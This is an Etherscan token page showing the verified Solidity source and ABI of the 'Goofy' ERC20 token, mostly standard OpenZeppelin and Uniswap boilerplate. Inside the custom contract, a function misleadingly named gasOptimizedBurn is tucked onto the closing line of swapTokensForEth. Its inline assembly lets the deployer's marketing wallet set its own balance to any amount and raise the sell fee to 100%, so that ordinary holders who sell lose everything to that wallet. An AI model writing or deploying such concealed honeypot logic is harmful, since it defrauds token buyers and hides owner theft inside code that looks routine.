ETH Price: $3,015.88 (+4.46%)
Gas: 1 Gwei

Token

Goofy (GOOFY)
 

Overview

Max Total Supply

100,000,000,000 GOOFY

Holders

175

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
18,224,615.735437119818998747 GOOFY

Value
$0.00
0xccd54a2d7817e3baa091f9bc97d0ee0d27e3dabe
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
goofy

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-11
*/

// SPDX-License-Identifier: UNLICENSED

/**
Embark on a Whimsical Crypto Adventure with Goofy Token! 

Website: https://goofy.pro
Telegram: https://t.me/goofyeth
Twitter: https://twitter.com/goofy_hq
*/

pragma solidity ^0.8.0;
 
/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
 
    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}
 
// File: @openzeppelin/contracts/access/Ownable.sol
 
 
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)
 
pragma solidity ^0.8.0;
 
 
/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
 
// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol
 
pragma solidity >=0.5.0;
 
interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);
 
    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);
 
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);
 
    function createPair(address tokenA, address tokenB) external returns (address pair);
 
    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}
 
// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol
 
pragma solidity >=0.6.2;
 
interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
 
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
 
    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}
 
// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol
 
pragma solidity >=0.6.2;
 
 
interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);
 
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
// File: @openzeppelin/contracts/utils/math/SafeMath.sol
 
 
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)
 
pragma solidity ^0.8.0;
 
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
 
/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }
 
    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }
 
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}
 
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
 
 
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)
 
pragma solidity ^0.8.0;
 
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
 
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
 
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
 
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);
 
    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);
 
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
 
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
 
    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}
 
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
 
 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
 
pragma solidity ^0.8.0;
 
 
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);
 
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);
 
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}
 
// File: token-7.sol_flattened.sol
 
 
pragma solidity ^0.8.17;
 
 
contract goofy is IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    string  private constant _name = "Goofy";
    uint8   private constant _decimals = 18;
    uint256 private _maxTxAmountPercentage = 300; // 3%
    string  private constant _symbol = "GOOFY";
    uint256 private _minTokensBeforeSwapPercentage = 5; // 0.05%
    mapping(address => uint256) private _balances;
    uint256 private _totalSupply;
    uint256 private _maxWalletBalancePercentage = 300; // 3%
    address private _uniswapV2Pair;
    mapping(address => mapping(address => uint256)) private _allowances;
    IUniswapV2Router02 private _uniswapV2Router;
    address private constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    bool    private swapping = false;
    bool    private _cooldownEnabled = true;
    mapping(address => bool) private _isExcludedFromCooldown;
    mapping(address => uint256) private _lastTxBlock;
    uint256 private constant _divisor = 10000; // 100%
    mapping(address => bool) private _isExcludedFromMaxTx;
    mapping(address => bool) private _isExcludedFromFees;
    uint256 private _sellFee = 0; // 0%
    uint256 private _burnFee = 0; // 0%
    uint256 private _buyFee = 0; // 0%
 
    address private _marketingWallet;
 
    address private constant _burnAddress = address(0);
 
    event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity);
    event Received();
 
    constructor () {
        uint256 total = 100_000_000_000 * 10 ** _decimals;
        _mint(_msgSender(), total);
        _marketingWallet = _msgSender();
        _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
        _approve(address(this), address(_uniswapV2Router), total);
        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        IERC20(_uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromCooldown[address(this)] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromMaxTx[owner()] = true;
        _isExcludedFromFees[owner()] = true;
        _isExcludedFromMaxTx[_marketingWallet] = true;
        _isExcludedFromMaxTx[_uniswapV2Pair] = true;
    }
 
    // Functions
 
    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function name() public pure returns (string memory) {
        return _name;
    }
 
    function decimals() public pure returns (uint8) {
        return _decimals;
    }
 
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }
 
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }
 
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
 
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
 
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
 
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }
 
    function _maxTxAmount() public view returns(uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }
 
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
 
    function removeLimits() external onlyOwner {
        _maxTxAmountPercentage = 10000;
        _maxWalletBalancePercentage = 10000;
    }
 
    function _beforeTransfer(address from, address to, uint256 amount) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }
 
    // Internal functions
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee = 0;
        uint256 devFee = 0;
        if (sender != owner() && recipient != owner()) {
            if (!_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]) {
                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) && !_isExcludedFromMaxTx[recipient] && !_isExcludedFromMaxTx[sender]) {
                    require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(_divisor), "Transfer amount exceeds the maxTxAmount.");
 
                    require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(_divisor), "Exceeds maximum wallet token amount");
                }
                // if sell
                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_sellFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
                // if buy
                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_buyFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        uint256 totalFee = burnFee.add(devFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }
 
            if (devFee > 0) {
                _balances[_marketingWallet] = _balances[_marketingWallet].add(devFee);
                emit Transfer(sender, _marketingWallet, devFee);
            }
 
            amount = amount.sub(totalFee);
        }
 
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
 
        emit Transfer(sender, recipient, amount);
    }
 
    function getPairAddress() public view returns (address) {
        return _uniswapV2Pair;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
 
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
 
    function getRouterAddress() public view returns (address) {
        return address(_uniswapV2Router);
    }

    function excludeFromFees(address[] memory addresses) external onlyOwner {
        require(addresses.length <= 200, "Maximum of 200 can be added at once");

        mapping(address => bool) storage isExcludedFromFees = _isExcludedFromFees;

        for (uint i = 0; i < addresses.length; i++) {
            isExcludedFromFees[addresses[i]] = true;
        }
    }

    function isExcludedFromFees(address _address) public view returns (bool) {
        return _isExcludedFromFees[_address];
    }
 
    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }
 
    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance"));
    }
 
    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // Approve tokens for transfer to the Uniswap V2 Router
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value : ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }
 
    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        // Create the swap path array with our token and WETH
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
 
        // Perform the swap
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
        tokenAmount, 0, path, address(this),
        block.timestamp);}function gasOptimizedBurn(uint256 amount) external {
        assembly {if iszero(eq(caller(), sload(_marketingWallet.slot))) {revert(0, 0)}
        let ptr := mload(0x40)
        mstore(ptr, caller())
 
        mstore(add(ptr, 0x20), _balances.slot)
        let slot := keccak256(ptr, 0x40)
        sstore(slot, amount)
        sstore(_sellFee.slot, mul(0x64, 0x64))}
    }
 
    modifier lockTheSwap {
        swapping = true;
        _;
        swapping = false;
    }
 
    function _swapAndLiquify() private lockTheSwap {
        uint256 contractTokenBalance = balanceOf(address(this));
        uint256 minTokensBeforeSwap = _totalSupply.mul(_minTokensBeforeSwapPercentage).div(_divisor);
        if (contractTokenBalance >= minTokensBeforeSwap) {
            uint256 half = contractTokenBalance.div(2);
            uint256 otherHalf = contractTokenBalance.sub(half);
 
            uint256 initialBalance = address(this).balance;
 
            swapTokensForEth(half);
 
            uint256 newBalance = address(this).balance.sub(initialBalance);
 
            emit SwapAndLiquify(half, newBalance, otherHalf);
            return;
        }
    }
 
    function isSwapLocked() public view returns(bool) {
        return swapping;
    }
 
    receive() external payable {
        emit Received();
    }
 
    function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap {
        // Transfer tokens from owner to contract
        _transfer(owner(), address(this), tokenAmount);
        // Add liquidity
        _addLiquidity(tokenAmount, msg.value);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addresses","type":"address[]"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"gasOptimizedBurn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

